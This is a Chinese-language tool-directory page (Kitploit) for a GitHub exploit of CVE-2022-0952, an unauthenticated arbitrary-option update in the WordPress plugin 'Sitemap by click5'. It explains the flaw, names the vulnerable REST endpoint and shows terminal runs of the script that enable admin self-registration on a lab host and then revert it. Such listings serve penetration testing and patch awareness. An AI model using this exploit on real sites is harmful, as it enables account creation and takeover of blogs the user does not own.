Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/randomrobbiebf/cve-2022-0952
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试错误配置
GitHubrandomrobbiebf/cve-2022-0952

CVE-2022-0952

Sitemap by click5 < 1.0.36 - 未经身份验证的任意选项更新

查看仓库
513年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-0952

Sitemap by click5 < 1.0.36 - 未授权的任意选项更新

描述

该插件在通过 REST 端点更新选项时缺乏授权和 CSRF 检查,并且未确保要更新的选项属于该插件。因此,未认证的攻击者可以更改任意博客选项,例如 users_can_register 和 default_role,从而允许他们创建新的管理员账户并接管博客。

示例:启用管理员与注册

root@kitploit:~
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555
The plugin version is below 1.0.36.
The plugin version is 1.0.35
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.

示例:禁用管理员与注册

root@kitploit:~
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555 --fix yes
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
下载工具